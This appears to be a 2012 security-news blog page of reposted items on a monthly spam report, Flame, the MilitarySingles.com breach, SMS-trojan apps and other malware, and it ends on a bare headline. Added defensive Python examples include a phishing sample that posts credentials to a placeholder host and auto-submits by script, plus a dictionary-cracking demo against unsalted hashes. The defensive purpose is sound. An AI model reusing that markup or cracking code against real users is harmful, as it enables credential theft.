Monday, 28 May 2012

Spam Report: April 2012

April in figures

  • The percentage of spam in email traffic was up 2.2 percentage points from March and averaged 77.2%.
  • The percentage of phishing emails remained unchanged from March and amounted to 0.01%.
  • In April, malicious files were found in 2.8% of all emails — the same amount as in the previous month.
  • Over 20% of phishing attacks in April targeted Facebook users.
Spam in the spotlight

New tricks spotted in fraudulent and malicious spam

Spammers who spread malicious code and phishing emails are still looking for the shortest route to computer users. Malicious spam is developing quickly, and malicious users are systematically adding to their arsenal of tricks, both with technical innovations and with new social engineering tactics.
Wikipedia and Amazon — bad experience?

In April, we detected spam that at first glance looked like a typical malicious mass mailing designed to pass as an official Facebook notification. The email, allegedly from the social network, announced a new Friend Request on Facebook. Like most of the emails made to look like Facebook notifications over the past year, this mailing was well done and, at first glance, looked like the real thing. The attackers intended that a user who clicked on any of the links in the email would be taken not to Facebook but to a website carrying malicious code. Sounds familiar, doesn't it? There is just one difference here: the links in the emails did not lead to hacked domains or to sites registered in the .in or co.cc domains, but to pages on Wikipedia and Amazon.

Apparently, the attackers had seeded malicious script on newly created Wikipedia pages and on pages made to look like Amazon.com listings for second-hand goods. Why "apparently"? Because the tactic was not especially effective: the teams at both services responded promptly, and by the time the links were being spread, the pages had already been taken down.


Diablo III – pre-release phishing

In early June the long-awaited game Diablo III is expected to hit the shelves. IT security professionals have particular concerns about this game because Blizzard has officially permitted the trade of in-game items in this new MMORPG, so it is reasonable to expect phishers to set their sights on Diablo III players quickly. But no one expected malicious users to start exploiting the game even before its release.
Phishing emails appeared in spam traffic playing on the impatience of gamers awaiting Diablo III's release. The emails told recipients they would be given the chance to play a beta version of Diablo III for a limited period; to do so, they would need to enter their Battle.net account details (Battle.net is the service where Blizzard account information is stored). Of course, the link in the email led not to the stated site but to a phishing page. Each email was slightly different, but the basic features were the same.

Having obtained a Battle.net user's login credentials, the attackers would have access to that user's accounts for popular games such as World of Warcraft and StarCraft, which remain in high demand on the black market.
Political spam

Political spam got back in action in April, primarily targeting US and French readers. Mentions of Barack Obama in spam emails were as frequent as they were during the first year after his election. Furthermore, his name is used not only in political emails “exposing his political course” or pointing to the allegation that the President of the US “is afraid of losing the upcoming election,” but also in emails advertising a variety of traditional spammer products. For example, his name is mentioned in one mass spam mailing offering Viagra.

With the upcoming elections in the US, Internet user interest in the battle for the presidency and the personalities of the candidates and the current president will only grow. Spammers will doubtless fan the flames of this interest by spreading propaganda, in addition to continuing to take advantage of this interest for their own purposes. In the months to come, we expect an increase in the number of emails with links allegedly leading to web pages with scandalous information about the candidates and the elections in general. Furthermore, the links will likely take users to advertisements for libido-boosting medications in the best case scenario (as in the example above), or to a malicious program in the worst case scenario.
French political spam is also more active these days, although we did expect a larger volume of political spam mailings in France during the frenzy of the recent presidential race there. The spam emails that we detected were few in number. They included advertisements for T-shirts with pro-Sarkozy slogans.

Other hot topics

The complex situation in Syria has also become the subject of spam emails. “Nigerian” spammers are actively mailing out messages from “lawyers and bank clerks working in the country.” At month’s end, we had also detected emails from “Assad’s wife.” We regularly encounter emails from the “family members of leaders” of a variety of countries facing unstable conditions. Sometimes Nigerian spam emails are even presented as having been written by these very leaders. So it is altogether possible that in the future we will see emails allegedly written by Bashar al-Assad himself. The Assads’ children are still quite young, so we are unlikely to see any of these emails allegedly written by them, although you never know. After all, nothing is sacred to spammers, and a crisis in any country is nothing more than an opportunity to rake in some cash.
We are also seeing a surge in the amount of spam exploiting the European football championship. The event is due to start in June, and interest among Internet users is growing by the day. Many spam mailings offer rooms to football fans who have not yet made hotel reservations in Poland and Ukraine. However, the accommodation offered by the spammers is bare-bones at best, while the prices have been greatly inflated.
The Summer Olympics in London are currently the focus of attention among “lottery” scammers. Just about every week we see emails announcing lottery winnings, allegedly from a lottery held by the Olympics Foundation.

Statistical summary

Sources of spam

Sources of spam in April 2012 (TOP 20)

In April, the Top 20 sources of spam underwent some major changes from prior months.
The most noticeable change over the month was the US jumping from 20th to 2nd place in the rankings: the proportion of spam originating in the US surged by over 7 percentage points. The amount of spam coming from China also increased, by 5 percentage points, and that country is now ranked 5th among the world's top sources of spam. Meanwhile, the share of unwanted mail originating in Indonesia fell by 5.2 percentage points, dropping the country 10 places to 12th.
We presume that this change in the spam landscape correlates with the redistribution of powerful spammer-run botnets and their relocation from regions where spam operations have been low-level over the past year. Note that both the US and China (and Hong Kong in particular) were some of the top targets in the first quarter of 2012 for spammers spreading malicious mailings. The infection of new computers in these countries has clearly led to the growth of new botnets.
The other changes in the ratings among sources of spam were limited to no more than 2.5 percentage points.
Malware in mail traffic

In April, malware was found in 2.8% of all emails, which more or less matches the levels detected in March’s mail traffic.
The distribution of email antivirus detections by country

The distribution of email antivirus detections by country, April 2012
Just as it was in the first quarter of 2012, the US has taken the leading position in terms of the number of email antivirus detections. The percentage of Kaspersky Mail Antivirus detections in the US rose only slightly, by just 0.64 percentage points.
Australia (-3.9 percentage points) and Hong Kong (-2 percentage points), countries that had been ranked second and third, respectively, in March, conceded their places to Vietnam in April, which climbed up from 4th to 2nd place. The proportion of mail antivirus detections in Vietnam increased by 2.4 percentage points.
The percentages of detections in other countries fluctuated within a range of 2 percentage points.
Top 10 malicious programs spread by email

Top 10 malicious programs spread via email in April 2012
Some 13.7% of all Kaspersky Mail Antivirus detections are for the traditional leader in our Top 10: Trojan-Spy.HTML.Fraud.gen. Detections of this Trojan were 1.6 percentage points higher in April than in March. This malicious program is designed to look like an HTML page serving as a registration form for a financial organization or an online service. The registration data entered on the page are then sent to malicious users.
The usual suspects in our Top 10 — the email worms Email-Worm.Win32.Bagle.gt, Email-Worm.Win32.Mydoom.m and Email-Worm.Win32.NetSky.q — are in third, fifth, and ninth place in this month’s ranking respectively. Readers may recall that the functions of the Mydoom and Netsky families of worms are limited to the harvesting of email addresses from infected computers, and sending themselves to these addresses. Bagle.gt is the only worm in the Top 10 that is also capable of sending requests to online resources and then downloading malicious programs.
We should draw attention to the appearance of the script Trojan Trojan-Downloader.JS.Iframe.cvq in April's Top 10. It accounted for nearly 2% of all mail antivirus detections. Another 10% or so of all mail antivirus detections in April were script-based malicious programs detected using proactive (heuristic) methods. This is worrying, because a script embedded in an HTML email runs as soon as the recipient opens the message in a client that renders active content; no attachment has to be launched.
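The two HTML-borne threats described above (a fake login or registration form that posts the entered data to the attacker, and scripts or hidden iframes that act as soon as the message is rendered) can be picked up with a few structural checks on the message body. The scanner below is an added illustration, not Kaspersky Mail Antivirus logic; the sample message, the sender domain example.com and the 198.51.100.7 / 203.0.113.9 hosts are constructed for the example.

```python
# Added example: a minimal heuristic scanner for HTML e-mail bodies, in the
# spirit of the threats described above (Trojan-Spy.HTML.Fraud.gen-style
# credential forms and script/iframe droppers). This is illustration code,
# not Kaspersky Mail Antivirus logic; the sample message below is constructed.
from html.parser import HTMLParser
from urllib.parse import urlparse


class _EmailHtmlInspector(HTMLParser):
    """Collects the tags and attributes a mail filter cares about."""

    def __init__(self):
        super().__init__()
        self.forms = []          # action URL of every <form>
        self.password_inputs = 0
        self.scripts = 0
        self.iframes = []        # src URL of every <iframe>

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)          # attribute values may be None
        if tag == "form":
            self.forms.append(a.get("action") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_inputs += 1
        elif tag == "script":
            self.scripts += 1
        elif tag == "iframe":
            self.iframes.append(a.get("src") or "")


def _host(url):
    return (urlparse(url).hostname or "").lower()


def scan_html_email(html, sender_domain):
    """Return a list of (rule, detail) findings for one HTML body.

    sender_domain is the domain the message claims to come from; a form
    that posts anywhere else is the classic fake "registration form".
    """
    p = _EmailHtmlInspector()
    p.feed(html)
    findings = []
    for action in p.forms:
        h = _host(action)
        if h and not (h == sender_domain or h.endswith("." + sender_domain)):
            findings.append(("form-posts-offsite", action))
    if p.forms and p.password_inputs:
        findings.append(("credential-form-in-mail",
                         f"{p.password_inputs} password field(s)"))
    if p.scripts:
        findings.append(("active-script", f"{p.scripts} <script> tag(s)"))
    for src in p.iframes:
        findings.append(("iframe", src))
    return findings


# Constructed sample: a "verify your account" mail that imitates example.com
# but posts credentials to an unrelated host, carries a zero-size iframe and
# auto-submits the form with script as soon as the body is rendered.
SAMPLE_MAIL = """
<html><body>
<p>Dear customer, please confirm your details below.</p>
<form action="http://198.51.100.7/collect.php" method="post">
  <input name="user"><input type="password" name="pass">
  <input type="submit" value="Verify">
</form>
<iframe src="http://203.0.113.9/go.php" width="0" height="0"></iframe>
<script>document.forms[0].submit();</script>
</body></html>
"""

if __name__ == "__main__":
    for rule, detail in scan_html_email(SAMPLE_MAIL, "example.com"):
        print(f"{rule:26} {detail}")
```

A real gateway would add the same checks to every MIME part that is rendered as HTML and would treat an offsite form action on a message that claims to be from a bank as sufficient on its own to quarantine the message.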
Phishing

The percentage of phishing emails remained unchanged from March and amounted to 0.01%.

The distribution of the Top 100 organizations targeted by phishers, by category — April 2012

This rating is based on detections by our anti-phishing component, which is triggered every time a user attempts to follow a phishing link, regardless of whether the link is in a spam email or on a web page.
In April, we saw a major change in the top phisher-targeted organizations: for the first time in four months, financial organizations (23.61%) left first place, and were replaced by social networking sites (28.8%). The percentage of social networking sites targeted in phishing attacks increased by almost 6 percentage points. The main contributing factor to that rise was due to the numerous attacks on Facebook: over 20% of all phishing attacks in April targeted Facebook users.
Compared to March, the percentage of attacks against financial organizations fell somewhat, as did the percentage of attacks against online stores and search engines, IT vendors and organizations in the “other” category. All of these changes were within a range of 1.5 percentage points.
The result is a slight shift in the focus of phishing attacks toward the users of social networks.
Spam by category

Spam by category in April 2012

The percentage of the traditional leaders in the top spam categories — Computer Fraud and Personal Finances — changed only slightly in April. The former fell by 2.2 percentage points, and the latter rose by 0.8 percentage points.
The share of advertisements for online casinos remains high at just over 6%.
Most spam emails advertising online casinos show clear signs of fraud or carry malicious code. The Personal Finances category consists mostly of dubious offers of cheap loans or fast cash, and there is usually something fishy about them.
Having reviewed these data, one can confidently say that more than half of all spam in April aimed to steal financial or personal information from computer users, as well as indirectly steal their money and install malicious code on their computers.
Incidentally, the most substantial change that we noted from March to April was a rise of 4.75 percentage points in the Interior Design spam category. In April, Kaspersky Lab noted several mass mailings in this category. Apparently, this surge in interior design-themed spam is connected to the “spring cleaning” advertising campaigns pushed by many furniture and renovation companies.
The percentages of other spam categories fluctuated only slightly in April, within a range of 1.5 percentage points.
Conclusion

It needs to be said that spam is posing more of a threat than ever: there is a high percentage of malicious code in attachments, and Kaspersky Lab is detecting a considerable number of spam emails containing malicious links. Furthermore, IT security professionals are seeing even more spam containing script-based threats, which means that merely opening an email can put users at risk. The fact that these mailings continue to spread from month to month shows that Internet users are not sufficiently informed; spam would not be such an attractive means of distributing malicious code if it were not so lucrative for cybercriminals. Internet users often do not even suspect that their computer, let alone their personal data or money, is at risk when they open a spam email.
In the months to come, we expect a return of the all-too-familiar spam mailings with scandalous news items about current US President Barack Obama. Furthermore, phishing attacks will likely focus more on social networking sites, and possibly online games — as summer vacation is upon us, students on break from school will be more active online. While these users tend not to have bank accounts, they do spend a lot of time on social networks and other online entertainment.



securelist.com

'Flame' cyberespionage worm discovered on thousands of machines across Middle East

Flame trojan code


The UN's International Telecommunication Union and Kaspersky Lab revealed today that they have discovered Flame, a new Trojan rivaling Stuxnet. Detected as "Worm.Win32.Flame," the malware is still being researched and is described as "one of the most complex threats ever discovered." It is believed to be active on thousands of computers in the Middle East, primarily in Iran and Israel, as well as on some machines in North Africa.
Researchers believe that the trojan's primary function is cyberespionage: once Flame infects a computer, it is equipped to record audio from connected or built-in microphones, monitor nearby Bluetooth devices, take screenshots, and save data from documents and emails. All of this data, apparently stolen as part of a targeted attack, is constantly sent up to command and control servers.
Flame "has no major similarities with Stuxnet" or its relative Duqu, and is believed to have been created and controlled by a separate group. The newly discovered worm does share some traits with Stuxnet and Duqu, however: notably, Flame exploits the same print spooler vulnerability and autorun.inf infection methods that Stuxnet used. According to Kaspersky Lab's reports, Flame is believed to gain its initial foothold through victims of phishing attacks; once on a computer it can spread to other machines over the local network or via USB flash drives.
The bad news is that it's confirmed that the worm has spread over local area networks to fully-patched Windows 7 systems, but the good news is that you shouldn't have to worry about Flame breaking into your PC in its current form. As a cyberespionage tool, the trojan has been seen targeting some individuals, but also education and government organizations mainly in the Middle East. Additionally, the research says that the worm surveys a system and will then uninstall itself from machines it thinks are not interesting.
Why is Flame considered such a complex threat, then? The malware itself can be as large as 20MB, about twenty times larger than Stuxnet. This size is part of what makes Flame unique. According to Kaspersky, most malware is kept as simple and small as possible, because that makes it easiest to hide the malicious code and get it onto unsuspecting machines. In this case, however, Flame's size made it hard to detect precisely because no one was looking for something that big. Part of the reason Flame is so large is that it has optional plug-ins that can be added after a machine is infected to go after specific data. Different machines carry different assortments of plug-ins; the 20MB maximum includes all 20 plug-ins discovered so far. Unfortunately, that size is going to make it difficult for researchers to get their hands around Flame: Kaspersky says that since it took "several months" to understand Stuxnet's 500KB of code, Flame may require a year's worth of effort.

theverge.com

Friday, 25 May 2012

How zombie LulzSec exposed privates' love lives with PHP hack



A dating website for US soldiers was hacked and its database leaked after it blindly trusted user-submitted files, according to an analysis by security firm Imperva. The report highlights the danger of handling documents uploaded to web apps.
"LulzSec Reborn" hacktivists attacked MilitarySingles.com and disclosed sensitive information on more than 170,000 lonely-heart privates in March this year. The hackers uploaded a PHP file that posed as a harmless text document, then used it to make the web server cough up its user database, including the hashed passwords.
Rob Rachwald, director of security strategy at Imperva, said the attack would have been blocked if MilitarySingles.com had filtered user-supplied content.
He added that similar vulnerabilities, which Imperva describes as Remote File Inclusion-style, will exist in other sites that use PHP and actively solicit uploads of photos, video and so on. In precise terms, the flaw described is an unrestricted file upload: the server accepted a PHP script because it was labelled as text, stored it where it could be requested, and executed it when it was.
Imperva reckons more than 90 per cent of the MilitarySingles.com passwords were cracked in nine hours thanks to extended dictionary-based rainbow lookup tables. MilitarySingles.com stored passwords as non-reversible hashes, rather than in plain text, however it did not salt the hashes, which would have made the process of recovering the passwords far more difficult. Insisting on hard-to-guess passwords isn't good enough unless developers pay attention to encryption best practices, said Rachwald.
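The nine-hour crack described above is what an unsalted hash database buys an attacker: one precomputed table, built once from a dictionary, is checked against every row with a single lookup. The block below is an added illustration, not Imperva's analysis code. The page does not say which hash MilitarySingles.com used, so plain MD5 is assumed here for the "unsalted" case; the user names and passwords are constructed.

```python
# Added example (not Imperva's analysis code): why an unsalted hash database
# falls to a precomputed table in hours, and what salting and a slow KDF change.
# MD5 is an assumption made for illustration; the page does not state which
# hash MilitarySingles.com used. All "users" below are constructed.
import hashlib
import os

WORDLIST = ["password", "letmein", "soldier1", "iloveyou", "qwerty"]


def unsalted(pw):
    return hashlib.md5(pw.encode()).hexdigest()


def salted(pw, salt):
    # Same fast hash, but the per-user salt means no table built in advance
    # can match it; the attacker has to hash the wordlist once per user.
    return hashlib.md5(salt + pw.encode()).hexdigest()


def slow_kdf(pw, salt, iterations=200_000):
    # A deliberately slow, salted KDF (PBKDF2-HMAC-SHA256) makes even the
    # per-user dictionary run expensive. Returns the hex digest.
    return hashlib.pbkdf2_hmac("sha256", pw.encode(), salt, iterations).hex()


def build_lookup_table(words):
    # Precomputed once, reusable against every unsalted database ever leaked.
    return {unsalted(w): w for w in words}


def crack_unsalted(db, table):
    """db: {user: hexdigest}. One dict lookup per row: effectively free."""
    return {u: table[h] for u, h in db.items() if h in table}


def crack_salted(db, words):
    """db: {user: (salt, hexdigest)}. No table helps: len(words) hashes per user."""
    cracked = {}
    for u, (salt, h) in db.items():
        for w in words:
            if salted(w, salt) == h:
                cracked[u] = w
                break
    return cracked


def hash_cost(db_users, wordlist_size):
    """Hash operations the attacker must perform: unsalted vs salted."""
    return {"unsalted": wordlist_size, "salted": wordlist_size * db_users}


if __name__ == "__main__":
    users = {"pvt_jones": "soldier1", "cpl_smith": "qwerty", "sgt_lee": "Tr0ub4dor&3"}
    unsalted_db = {u: unsalted(p) for u, p in users.items()}
    salted_db = {}
    for u, p in users.items():
        s = os.urandom(16)
        salted_db[u] = (s, salted(p, s))
    print("unsalted:", crack_unsalted(unsalted_db, build_lookup_table(WORDLIST)))
    print("salted:  ", crack_salted(salted_db, WORDLIST))
    print("work for 170000 users:", hash_cost(170_000, len(WORDLIST)))
```

Salting removes the shared precomputation but does nothing about speed: the dictionary still falls for every user whose password is in it, which is why the slow KDF is needed as well as the salt.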
The attack against MilitarySingles.com is the only notable assault by LulzSec Reborn. Imperva's analysis suggests the group has no more than six members, who set out to "embarrass the military". The crew is apparently "not as motivated" as the original LulzSec, according to Rachwald, adding that it has made little or no contribution to IRC chats and hacker forums.

MilitarySingles.com, which bills itself as the "dating website for single soldiers... and those interested in meeting them", is run by eSingles Inc.
Government and military personnel ought to have special policies regarding social networking to prevent their information from being easily accessed and manipulated. Rachwald told El Reg that an outright ban is likely to be flouted. Instead soldiers should be encouraged to use pseudonyms and particularly warned against disclosing their location, he said.

theregister.co.uk

Fake Angry Birds app makers fined £50k for shock cash suck



A firm that disguised Android malware as Angry Birds games has been fined £50,000 ($78,300) by UK premium-rate service regulator PhonepayPlus.
A1 Agregator posted mobile apps posing as smash-hit games, including Cut the Rope, on Android marketplaces and other outlets. Rather than offer free entertainment, the software silently sent out a text in order to receive a string of premium-rate messages, costing victims £5 per SMS. Users would have to uninstall the counterfeit apps from their phone to prevent further messages and charges.
The malicious code also covered up evidence of the message swapping which might have alerted punters to the whopping charges on their upcoming bills.
A total of 34 people, perhaps only a small percentage of those affected, complained to PhonepayPlus by the end of last year. In a ruling this month, the watchdog found A1 Agregator guilty of multiple breaches of its code of conduct and levied a fine of £50,000, estimated as the upper limit of the illicit profits made through the scam. A1 Agregator, which wasn't even registered with PhonepayPlus at the time of its offence, must refund defrauded victims in full within three months, whether they've complained or not.
It is understood the firm trousered £27,850 ($43,600) from the scam.

A1 Agregator - which was "formally reprimanded" over its behaviour - must also submit any other premium-rate services it develops to PhonepayPlus for approval over the next 12 months.
Premium-rate SMS scams account for 36.4 per cent of malware on smartphones, the second largest type after spyware, according to analysts Juniper Research.
And Carl Leonard, senior security research manager of EMEA at Websense, added: "Mobile apps are a powerful malware delivery technique as most users are willing to allow apps to do anything to get the desired functionality. Cyber criminals are beginning to use these malicious apps not only to make a quick buck but to also steal valuable data."
"For example, a malicious app could access the data on your phone, or access all of your contacts. This is particularly bad news for businesses that allow bring your own device (BYOD) schemes but don’t have the right security to protect their mobile data," he added.

Android virus evolution

Mobile malware scams first emerged in Russia and China several years ago. Fraudsters are beginning to turn to the West for victims, Kaspersky Lab warns.
"The mobile threat landscape is dominated by malware designed to run on Android – 65 per cent of all threats are aimed at this platform," said David Emm, senior security researcher at Kaspersky. "The platform is popular, it’s easy to write apps for it and it’s easy to distribute them via Google Play – so it’s little wonder that cybercriminals are making use of Google Play, where malware masquerades as a legitimate app."
"SMS Trojans, of the sort mentioned in the [PhonepayPlus] report, are currently the biggest category of mobile malware. And it’s important to understand that it’s not just a problem in Russia or China. Cybercriminals seek to make money from them across the globe, including here in the UK," he concluded.
In the past mobile malware often offered a free application as bait. During installation, the Trojan would display some kind of decoy error message. This prompted victims to search for answers on web forums and elsewhere, which was the last thing scammers wanted, because it could lead marks to the realisation that they had been suckered.
More recently cybercrooks have begun offering a bait that actually works. A blog post by F-Secure, published with a helpful video, describes an unrelated case of a Trojan installing a working copy of Rovio's Angry Birds Space as it compromises the phone.


theregister.co.uk

Hackers Reveal the Price of iOS Jailbreaks at HITB 2012 Amsterdam



There have been a lot of interesting developments here at Hack in the Box in Amsterdam, and one of them is the first ever union of the jailbreak Dream Team. Today, Softpedia has had the chance to interview the members of the Chronic Dev Team and learn some things that many were probably curious about.

One of the topics we discussed referred to the financial value of jailbreaks. So how much is their work and the information they possess worth?

“This is hard to answer. I think it depends on who you sell your exploits to, if it’s for the underground or the legal scene,” Pod2g said.

“This is a difficult question to answer, but it's a lot. Every jailbreak exploit represents like, maybe, $100,000. This is the price of all root exploits.”

We then asked him to comment on a recent statement in which he said he wouldn’t sell the beta version even for $1 million (760,000 EUR).

“I wrote that, but it's not all about the money. We're doing this for the fame of course. We're doing it for the people, because we want people to be able to have their devices jailbroken,” he explained.


“This is what we're doing. This is what we like, so this is not about money. That's why even if we could get anything from these jailbreaks, if the only thing we could get is to make people happy, that is enough for us.”

It’s interesting to see a price estimate for the jailbreaks, but as the hackers highlighted, it’s not all about the money. There probably isn’t a researcher in the world who would refuse money if someone wanted to reward him, but these guys really gave us the impression, during our talk, that they’re really in it for the challenge and the users, not for their personal gain.


softpedia.com

Saturday, 19 May 2012

Hacker Behind “Call of Duty” Trojan Sent to Prison for 1.5 Years



Many gamers may have come across a Trojan-infected file advertised as a patch for the popular Call of Duty game. As it turns out, the person behind this scheme is a 20-year-old student from the UK who used the malware to collect credit card details from infected computers.

Kent Online reports that Lewys Martin was apprehended by police while trying to steal computer equipment from colleges in Dover and Deal.

When investigators searched his house, they uncovered documents containing 300 credit card credentials, along with passwords. The details of a fraudulent bank loan were also found.

Prosecutors accused him of using the Trojan to collect credit card details, passwords and credentials for websites such as PayPal, which he sold on underground markets for sums between $1 (0.76 EUR) and $5 (4 EUR).

Now, he has been sentenced to serve 18 months in prison for fraud and burglary charges.


Apparently, Martin was already known to law enforcement as a burglar, having been caught on numerous occasions breaking into educational institutions. However, we are more interested in the part where he used the piece of malware to commit his crimes.

This incident shows that users subject their digital assets to numerous risks when downloading games from untrusted sources.

We’ve recently seen how most “Diablo 3 free download” searches point to malware-laden websites. With patches and key generators the problem is even more serious because most of the malicious files actually work, making users disregard the warnings displayed by their antivirus software.

What they don’t know is that while they’re happy to be playing the game, a nasty Trojan is logging their every move, stealing every bit of valuable information it finds.

“Game players would be wise to pay attention to the technique used by Lewys Martin to infect computers,” Graham Cluley, senior technology consultant at Sophos, advises.

“It's not uncommon for malware to be distributed in the form of cracks and hacks for popular computer games - if you run unknown code on your computer to meddle with a video game, you might well be allowing malware to insidiously install itself too.”


softpedia.com

Social Engineering and Hacking Skills Put to the Test at HITB 2012 Amsterdam



As we’ve mentioned on previous occasions, this year’s Hack in the Box (HITB) security conference in Amsterdam will feature a lot of great speakers and challenges. One of these will be the “Social Engineering and CTF Challenge” created and run by Sogeti Nederland B.V.

“With #SSEC2012, Sogeti Nederland is very excited to bring a social engineering element into this year’s HITBSecConf. The human factor is often referred to as the weak link in infosecurity defenses,” revealed Martin Visser, a senior security specialist.

“This challenge is aimed to not only highlight the human risk factor, but to also demonstrate the ease with which it can be compromised. Knowing what are the common pretext strategies used to fraud employees is key in protecting organisations from social engineering attacks.”

The competitors' skills will be put to the test in a contest whose purpose is to raise awareness of attacks that target the weakest link in cybersecurity: the human factor.


Over the course of two days participants will have to hack into wireless routers, social engineer the employees of high-profile Dutch companies and solve a challenge in Sogeti’s CTF web app.

For the social engineering part, contestants will have to trick company employees into performing certain tasks or handing out certain pieces of information. Of course, they will not have to obtain passwords or other sensitive data, but less significant details such as the name of the company’s catering company.

“The human element remains a major potential security vulnerability in any organisation. Verizon’s 2011 Data Breach Investigations report showed that 11% of breaches are from social engineering attacks and of these, 44% are from pretexting”, said Dhillon Andrew Kannabhiran, the founder and CEO of HITB.

Users from all around the world can join in on the action, since it will be broadcast via webcam feed and audio stream.


softpedia.com

Flashback Operators Fail to Cash Out Their “Winnings”



Some time ago Symantec revealed that the masterminds behind the now-infamous OSX Flashback Trojan made bundles of money. Further analysis, however, has shown that they may have failed to collect as a result of their operations.

Previously, we had learned that the fraudsters made money by displaying ads on compromised computers. The figures show that they’ve displayed 10 million advertisements on the devices of the affected individuals over the course of three weeks.

Of those 10 million, 400,000 were actually clicked on, which would normally have earned them $14,000 (10,640 EUR) from the pay-per-click (PPC) providers.

However, according to Symantec, the PPC firms don’t just hand over money to anyone without performing a few checks, this being a perfect example of a situation in which the scammers failed to bypass the anti-fraud measures.

Firms that offer PPC services are more than happy to pay up if users actually see their ads, but in click fraud cases such as this one, the victims may not see the ads, and they’re certainly not interested in the content that's being displayed because in most cases it’s irrelevant.

Furthermore, the cybercrooks may have analyzed each PPC provider to see which one suits their needs, since 98% of the adverts originate from the same organization.


While it’s estimated that a total of 600,000 machines have been infected with Flashback, in reality only 2% (around 10,000) of them were compromised to serve the final payload, the one that actually earned money.

As the researchers highlighted, the campaign was a success, but it could have been even more so, a situation in which the fraudsters could have made millions of dollars in a year.

Fortunately, they failed to collect, which may discourage others from launching such campaigns. On the other hand, the failure may make them more determined to try harder next time.


softpedia.com

Worm Uses Facebook PMs and Instant Messaging Apps to Spread



Social media platforms and popular instant messaging (IM) apps are great mediums for cybercriminals to spread their malicious elements. Trend Micro experts provide a great example of a worm that’s making its way to computers using such methods.

The researchers report that the piece of malware, identified as Worm_Steckct.evl, is distributed via a link that’s sent in private messages on Facebook and IM programs.

The shortened links contained in the posts point to an archive called “May09- Picture18.JPG_ www.facebook.com.zip”, which hides a file named “May09-Picture18.JPG _www.facebook.com.” The .com extension reveals that this is in fact an executable file, not a picture.

Once it’s run, the worm steps into play and terminates all the processes and services created by security software, thus ensuring that antivirus applications cannot disrupt its evildoings.


Steckct.evl then downloads another worm, detected as Worm_Eboom.ac, which monitors the victim’s browsing sessions.

The worrying part is that it doesn’t only log the posts and private messages the user creates or deletes on Facebook, MySpace, Twitter, WordPress, or Meebo, but it can also spread by utilizing the user’s active session on these sites.

“Facebook and IM applications are tools to share and connect. Cybercriminals’ use of these tools is nothing new, but there are users who fall prey to these schemes. We recommend users to be conscious with their online behavior, in particular on social media sites,” Cris Pantanilla, Threat Response Engineer at Trend Micro writes.

As the expert highlights and as we’ve highlighted numerous times before, internauts must be wary of links that point to shady-looking websites or suspicious files.

In this particular case, it’s clear that the alleged picture taken on “May09” is not a JPG file, but an executable that’s not even so cleverly masked.
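A name-and-content check for the trick described above, written as an added example (not Trend Micro's or Softpedia's code): it flags zip members whose real extension is executable while an image extension is buried earlier in the name, and members whose bytes carry a PE header despite a harmless-looking name. The sample archive is constructed inline.

```python
"""Flag archive members that hide an executable behind an image-like name,
as in the 'May09-Picture18.JPG _www.facebook.com' file described above.
Added example, not Trend Micro's or Softpedia's code; the sample archive
built below is constructed for illustration."""
import io
import os
import re
import zipfile

# Extensions Windows will run directly on double-click (DOS-era .com included).
EXECUTABLE_EXTS = {".exe", ".com", ".scr", ".pif", ".bat", ".cmd", ".vbs", ".js"}
# An image extension sitting inside the stem, followed by space, '_', '-' or '.',
# e.g. 'may09-picture18.jpg _www.facebook' once the real '.com' is split off.
IMAGE_IN_STEM = re.compile(r"\.(jpe?g|png|gif|bmp)(?=[\s_.\-]|$)")


def real_extension(name: str) -> str:
    """The extension the OS actually honours: everything after the last dot."""
    return os.path.splitext(name)[1].lower()


def looks_like_image(name: str) -> bool:
    """True if an image extension is buried in the stem, before the real one."""
    stem = os.path.splitext(name)[0].lower()
    return IMAGE_IN_STEM.search(stem) is not None


def is_disguised_executable(name: str) -> bool:
    """Name-based check: executable extension hidden behind an image name."""
    return real_extension(name) in EXECUTABLE_EXTS and looks_like_image(name)


def has_pe_header(data: bytes) -> bool:
    """Content-based check: Windows PE executables start with the 'MZ' magic."""
    return data[:2] == b"MZ"


def scan_archive(data: bytes) -> list:
    """Return (member name, reason) for every suspicious member of a zip."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename
            if is_disguised_executable(name):
                findings.append((name, "image-like name with executable extension"))
            elif (real_extension(name) not in EXECUTABLE_EXTS
                  and has_pe_header(zf.read(name))):
                findings.append((name, "MZ header under non-executable name"))
    return findings


def build_sample_archive() -> bytes:
    """Constructed zip mimicking the one in the report (contents are dummies)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("May09-Picture18.JPG _www.facebook.com", b"MZ\x90\x00dummy")
        zf.writestr("holiday.jpg", b"\xff\xd8\xff\xe0")      # genuine JPEG magic
        zf.writestr("notes.txt", b"MZ header, wrong name")   # PE magic, text name
    return buf.getvalue()


if __name__ == "__main__":
    for name, reason in scan_archive(build_sample_archive()):
        print(f"SUSPICIOUS {name!r}: {reason}")
```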


softpedia.com

Thursday, 17 May 2012

Criminal case file compiled over malicious software on web pages

PRESS RELEASE

Malicious software was detected on the internet that purports to
block web pages and computers on behalf of the Hellenic Police.

A message appears informing the user that
unblocking requires payment of a fee of 50 euros via a prepaid card.

The sites involved are ones that offer illegal "downloading" of films, songs and other digital files.


Malicious software was detected once again on the internet; it displays a message claiming that web pages, and accordingly the users of those pages, have been blocked by the Hellenic Police (EL.AS).
The message states that, for the computer to return to normal operation, unblocking requires sending 50 euros via a prepaid card (Paysafe card).
As the police investigation found, the malicious software is hosted on websites from which users can download digital files with audiovisual content (songs, films, etc.), and it infects computers running the Windows operating system.
Specifically, while the web page is "loading", a message appears automatically on the computer screen informing the user that illegal music files have been detected and that, for this reason, his computer has now been blocked by the Hellenic Police.

If the user enters the number of the prepaid card, it is sent to a specific electronic address and stored in a database that has been set up for the purpose, giving other persons access to those details.
The Cyber Crime Division has compiled a case file, which will be submitted to the Athens Prosecutor's Office of First Instance.
Citizens who may have encountered this malicious software, or whose computer has been infected by it, are asked not to enter the amount supposedly required to unblock it and, in any case, if they wish, may file a complaint with the Cyber Crime Sub-Directorate (173 L. Alexandras, 11522, Ampelokipoi).
The suggested remedy is to restart the computer in safe mode (press F8 and select safe mode at startup) and then perform a System Restore to a date earlier than the date on which the message appeared (System Tools > System Restore).
Note that, before performing a System Restore, citizens should consult the following web page, http://windows.microsoft.com/el-gr/windows-vista/What-is-System-Restore, for what System Restore means and which kinds of files it modifies.
For more information about infection by this malicious software, contact the Cyber Crime Division at the following contact details:

Tuesday, 15 May 2012

Avast Warns About “FakeInst” and Alternative Android Markets


